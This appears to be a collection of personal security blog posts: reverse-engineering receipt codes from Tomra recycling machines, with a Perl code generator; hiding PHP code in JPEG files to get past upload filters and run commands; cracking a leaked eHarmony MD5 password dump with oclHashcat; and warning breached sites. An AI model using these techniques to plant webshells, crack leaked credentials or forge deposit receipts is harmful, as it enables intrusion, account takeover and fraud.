Linux uses the mkstemp function to create its random strings for the file names. This is pretty secure but not fool proof. As mentioned earlier I will update this article when I have fixed test data for this scenario as well. More to come.

UPDATE – 161129: I’ve tried to contact the PHP security team about this (twice) and have not received a single response. I have therefore decided to just post this now and all future results relating to this issue.

Having some fun with reverse vending machines – part 2

Alright, so I managed to get a few more receipts!

I got 1 receipt from the same store as before, and 1 receipt from another store (with the same machine, from the looks of it at least).
We can start with the receipt from the new store as I’m not going to go very deep into that at the moment.

I recycled one can in that store, and the EAN code on the receipt was

9 801104 699975

From this we can’t really get much info more than it’s one of the following parts that are important to identify at first (since we got 1 SEK from that can)

9 801104 699975
or
9 801104 699975

Another important thing to note, is the maker and model of the machines.

The first store that I went to, uses a “Tomra T-83 HCpIII”, while the new store I went to today uses a “Tomra T-83 HCpII”.
On the Tomra website they only advertise a “Tomra T-83 HCp”, so the III and II might be a yearly model or a firmware version (since they are not visible on the machine, only on the receipt), but I’ll see if I can dig out some more information about that.

Tomra T-83 HCp website
Tomra T-83 HCp PDF

tomra-t-83hcp_p1

So the first “light” conclusion we can draw here today, is that

1: The receipts can’t be used across stores, even if they are using the same machines.
Although the exact mechanism behind this is still unknown, I have some theories:

  • The store can decide the structure of the EAN code themselves
  • The manufacturer decides the structure per customer (meaning that it could be the same structure in the same chain of stores, although I have to confirm this later)
  • The structure of the EAN depends on the Firmware version (or that II and III model numbers which I have yet to figure out what they more exactly) – friend suggested this one

Now, putting that aside for now (since I only have one receipt anyway, and I want to finish figuring out the first store before I go with another one, although I don’t really see much point in that just yet, other than figuring out if any of the above theories are correct).

Like I mentioned before, I have a new receipt from the first store (the main one in this project).
And it looks like this:

7 cans – 1 SEK each
1 bottle – 2 SEK

And the EAN code is:

9 999900 000900

I suggested in the first blog post about this project, that it could be 907 (although I had taken 900 into consideration, I actually didn’t think it would be that since it felt the least logical to me, but hey, what the heck). So now that we know this, we now have the following list of codes (If you haven’t figured it out yet, the ones in bold are the ones I have so far):

0108
0207
0306
0405
0504
0603
0702
0801
0900
1006
2003

Now that we know all this, we’ll make another assumption.
Since we know 10 and 20, it should probably look something like this

0108
0207
0306
0405
0504
0603
0702
0801
0900
1006
1105
1204
1303
1402
1501
1600
1706
1805
1904
2003

I don’t understand why they would skip number 7 here, but the only way I can see that 20 gets number 3 as a control code is this way.
So my current assumption is that they simply use 0-8 as control numbers for 1 digit values, and 0-6 for 2 digit values.
It doesn’t feel right, and I feel that there’s more to it, but I need more data to draw any other conclusion at the moment.

But just to play around with the thought of this being the case, I made a small Perl script to print the numbers as they might look like.
The problem is here, that I don’t know what happens when the number reaches a new length in digits (like when it goes from 99 to 100), if it ignores the fact that it’s a new one and continues until the control digit reaches 0, or if it stops even if the control digit for 99 is still at 1, and then just resets to 4 right away. But I will assume the later, and then try to get a receipt for 100.

#!/usr/bin/perl
use warnings;
use strict;

my $cont = 8;
my $len = 1;
for(my $i = 1; $i <= 110; ++$i, --$cont)
{
        if($cont < 0 || $len < length($i))
        {
                $len = length($i);
                $cont = 10 - (length($i) * 2);
        }

        print $i . '0' . $cont . "n";
}

To be continued!

Uploading dangers

A few weeks ago I was reading a forum thread about file upload scripts in the PHP scripting language. The people in the thread were discussing different ways of handling different file types when allowing users on their websites to upload files to the server. Security wasn’t really on the topic here, but there were still mentions of it. The most common problem that is mentioned when it comes to file uploading is that there is a need to somehow restrict what kind of files the users are allowed to upload, how to handle them once they are on the server and so on.

In this case their solution was to disallow users from uploading files with the php extension, and then by using a PHP function called ImageJpeg they would verify that the users were uploading valid pictures (The forum user in question was making an image upload script for his community website). Now, as a developer I can see why this seems like a pretty nice idea, since the data would be verified and changed in the ImageJpeg function. If the file was not a valid image then the function would return false and the file would not be properly uploaded. And even if a malicious user were to put code within the data part of the image, that data would always be changed when the ImageJpeg function has finished and saved the file to disc.

The so called “black listing” of file extensions is usually not a good idea since there exists many different alternatives to one executable extension. If we take the example above where they prevented users from uploading files with the php extension. PHP has 5 alternative extensions, these being .php3, .php4, .php5, .phtml and .phps. And if a developer of a script only restricts .php, then the other 5 can be used instead to upload malicious code to the server.

I found it an interesting topic and decided to see if I can somehow bypass their protection and upload executable code to my test server using their upload scripts. The first thing that came to mind was that jpeg images allow so called “exif” data that can hold comments for image viewers and editors to display in different ways. Although this bubble burst rather quickly as I discovered that the ImageJpeg function always overwrites the exif data with its own, including the comments.

So now I had to fire up a hex editor and get to work, and see if I can insert data into the image itself, while making sure it’s still a valid image that would pass through the ImageJpeg function. The difficulty with this, just as discussed in the thread, was that the data was always changed and thus my code was not intact when the file was saved to disc. The image would in almost all cases be a valid one, although a bit distorted due to my meddling.

After hours of playing around with this I managed to get an image that when injected with code and run through the function, the code would still be intact and executable on my server.

hex

So after even more hours of trying to perfect this method, making sure the image is always a valid one and that it’s not too distorted from the changes, I wrote a script that injects the code automatically and makes sure that the code will still be there after being changed with different image handling tools, like the ImageJpeg function (It was also tested with tools that performs resize on the picture, and although this worked in many cases it was significantly harder to retain the code after processing).

Below is the picture before the injection

logo

Followed by the picture after the injection (notice how in this example, the picture got a little bit distorted at the end. This varies from case to case). Don’t worry, the code can’t execute in its current form.

logo_mod

So to summarize. After a few days I did manage to bypass their protection followed by writing a script to automate it all. Some example output from the script can be seen below.


[+] Jumping to end byte
[+] Searching for valid injection point
[+] Injection completed successfully
[+] Filename: result.phtml

And to top it up I also made a small script to send commands to the file once it has been uploaded to a server, parse the results out of the image data once returned and display it.


uname -a
Linux truesechp01 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:00:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

And this shows how very easy it is for things to go wrong with file upload functionality. There are so very many ways to do bad things with it, and a motivated attacker can in many cases spend days, months or even years to find a way around your protection mechanisms. The trick I have showed you in this article today is not limited to PHP, but can be applied in other environments as well. There are a few measures that can be good enough depending on the situation when handling uploaded files to a server, but there’s no silver bullet as there are in many cases ways to circumvent them as well, the best example being that the developer who implements it simply does it wrongly (classic one is that they only check for the presence of .jpg in a filename, which would then allow the uploading of a file.jpg.php).

For those who decide to solve all this by using blacklisting and block file extensions like .php,.phtml,.php4,.php4,.php5. Be aware, PHP 7 will be released eventually 😉

UPDATE: And PHP 7 is here, and the vulnerability is back 🙂

Your passwords are never really safe

There have been a lot of user credential leaks lately according to media.
Some of them involve whole user databases with all kinds of credentials, and some involve “only” credit card numbers and so on.
It usually depends what the attacker is after when he/she/they break into the servers of the targeted company.

The thing that people don’t always know about this is that there are passwords being leaked all the time from hundreds of websites without
us even knowing about it. Some really huge leaks will never see daylight because the people behind the site never detects the intrusion, and the people behind the attack wants to keep it to themselves. Personally I have a unique email for every account I create, so that if they give out my details to a third party or if someone breaks into their systems, I’ll know.

Fresh databases with user credentials are worth a lot to many people on the black market for several reasons.

  • The email addresses can be used for spam
  • The email and password combination can be tried against different services like Facebook or Twitter and used for a number of things (spam being one of them)
  • The passwords can be put into a wordlist and used for cracking other passwords in the future

There have been many cases where website owners haven’t encrypted or hashed the passwords of the users, which have made life a lot easier for the intruder who then steals and potentially leaks the information (actually a lot easier, since very long passwords are harder to crack by brute force as it takes an enormous amount of time). But of course, today in most cases we see that they use some sort of encryption or password hashing. And even though this is a very positive thing, it doesn’t always help that much. If your password is too short and the password has been hashed, then it is in most cases lost. If it has been encrypted then there might still be hope, but then the hope lies upon the safety of the encryption key. And if the intruder has gotten access to the database, then the key might not be safe either.

The thing about the mind of a hacker that people don’t think about, is that a determined hacker wont stop just because it’s complicated or a hassle. If it’s a “hard to exploit” vulnerability then it simply means that it’s all a matter of time. And if the hacker thinks it’s worth the trouble, then years can be spent breaking in if needed. It’s the same with these databases. You all probably know about the Adobe intrusion and how all the users information was leaked on the Internet. These passwords were encrypted, although in a way that makes them not unique which has the problem of one password in its encrypted state will look the same for all users with the same password. This database has as of this date (as far as we know), not been completely cracked as the encryption key has not been discovered. But I’m sure that someone somewhere is working on that. Some determined hacker wants to get their hands on the key. Computers are getting faster and faster, so it’s just a matter of time.

I would like to demonstrate the typical process of your password getting in the wrong hands.
I downloaded the published dump of the eharmony.com password list with over 1500000 password hashes from users of the site.
Then I loaded them all into a password cracker called oclHashCat, and within seconds this was the result.


Session.Name...: oclHashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1) [6]
Hash.Target....: File (/home/cats/eharmony-hashes.txt)
Hash.Type......: MD5
Time.Started...: Wed Aug 13 21:42:11 2014 (4 secs)
Time.Estimated.: Wed Aug 13 22:50:22 2014 (1 hour, 7 mins)
Speed.GPU.#1...: 57925.6 kH/s
Speed.GPU.#2...: 62493.3 kH/s
Speed.GPU.#3...: 63531.4 kH/s
Speed.GPU.#4...: 42643.3 kH/s
Speed.GPU.#*...: 226.6 MH/s
Recovered......: 73454/1513805 (4.85%) Digests, 0/1 (0.00%) Salts
Progress.......: 738197504/735091890625 (0.10%)
Skipped........: 0/738197504 (0.00%)
Rejected.......: 0/738197504 (0.00%)
HWMon.GPU.#1...: 38% Util, 52c Temp, 43% Fan
HWMon.GPU.#2...: 36% Util, 48c Temp, 36% Fan
HWMon.GPU.#3...: 31% Util, 49c Temp, 45% Fan
HWMon.GPU.#4...: 33% Util, 47c Temp, 36% Fan

As you can see, 73454 passwords were recovered within 5 seconds. After 2 minutes the status is “388429/1513805 (25.66%)”. And this is by sheer brute force (I usually start with brute force when cracking MD5 since it’s so fast anyway). I haven’t even started to use my wordlists yet. By getting all these passwords in clear text I expand my database of wordlists with more user passwords that can be used in attacks later on. After about 1 hour I decided to stop the brute forcing process and try with a wordlist instead.

As you can see on this result there is one GPU less. This is because one graphics card broke during the brute forcing of the passwords. I have disconnected the damaged card for now until I can take a closer look later to see if it can still be used or not. Anyway as you can see, after only 5 minutes we have cracked 106794 passwords with the wordlist, leaving about 676732 still unsolved. Now, this list of passwords has already been cracked once my someone else, so I wont go for 100%.


Session.Name...: oclHashcat
Status.........: Exhausted
Input.Mode.....: File (../dics/crackstation.txt)
Hash.Target....: File (/home/cats/eharmony-hashes.txt)
Hash.Type......: MD5
Time.Started...: Thu Aug 14 08:30:44 2014 (5 mins, 51 secs)
Time.Estimated.: 0 secs
Speed.GPU.#1...: 3204.3 kH/s
Speed.GPU.#2...: 2937.5 kH/s
Speed.GPU.#3...: 2942.3 kH/s
Speed.GPU.#*...: 9084.1 kH/s
Recovered......: 106794/783526 (13.63%) Digests, 0/1 (0.00%) Salts
Progress.......: 1167547735/1167547735 (100.00%)
Skipped........: 0/1167547735 (0.00%)
Rejected.......: 14082514/1167547735 (1.21%)
HWMon.GPU.#1...: 29% Util, 49c Temp, 40% Fan
HWMon.GPU.#2...: 64% Util, 48c Temp, 35% Fan
HWMon.GPU.#3...: 64% Util, 45c Temp, 37% Fan

So to summarize. Pick long and complex passwords, and preferably unique ones for every site you register at. Personally I try to make up rules in my head for my passwords, and then I make up phrases for them. “Ch1ldOfL1ght1s@Gre@tG@me” is an example of a good password. Length is better than complexity, but it’s even better if you can mix in both. Also, if a site gets hacked and you have an account there, don’t trust that they have encrypted or hashed your passwords correctly. If it’s an important password that you have used in several places then you should always assume the worst and change it as soon as possible.

When security is not taken seriously

So I have this project going on for a while now where I’m trying to track a script kiddie that has been using sqlmap to hack literally hundreds of websites for about half a year now. He then proceeds to publish the information about the sites he has broken into, and while doing so shows a lot of signs of inexperience in the field. I don’t want to go too deep into the details of this little project in fear of alerting the person in question. But I do want to talk shortly about an incident that happened recently that is directly related to this project, that shows what can happen when security is not taken seriously.

A few days ago I checked on the list of websites that the guy has hacked. I noticed that he had added a bunch of new sites to his list and stated on some of them that he had only checked the database names and a list of tables in them. He had, according to what he said, not extracted any other sensitive information. Reading this, I proceeded to quickly contact the affected websites (I always do this, but sometimes I do it faster if I think that the data on the servers haven’t been touched yet) in hope of preventing any further damage. I have a template that I use for all contact with sites in this project, and I have even been reported for spamming by one of the company. Ungrateful as it may sound, I understand their reaction.

Among the sites I contacted, one was especially quick to reply to my E-mail. Stating that this incident had nothing to do with them and did not affect their website or business. I was surprised at first and thought that I might have made some error in contacting them and perhaps had contacted the wrong company. After double and triple checking, I decided to reply to the E-mail and ask if the website (including the link to the affected website) was indeed their website. It should be noted that if their websites address was “verylegitimatewebsite.tld”, then the contact address I was sending my E-mails to, was “info@verylegitimatewebsite.tld”.

This is how I think a lot of people see IT-security consultants these days when we try to tell people that security needs to be taken more seriously.

After a while the person on the other end responded that the site indeed belonged to them.
I’m not sure what brought on the first reply that it had nothing to do with them, but it became clear to me that this person had no idea what I was talking about and didn’t really seem to care either. I wrote a bit more detailed response more directed towards this specific website (instead of just generally direct them to the list of affected sites like I usually do to save time) to try to explain the situation and what all this could lead to, damages etc. I have so far not gotten a response, but I am still eagerly waiting for it.

During the conversation we had over E-mail, their user database was stolen and information regarding it was published.

Take it seriously folks.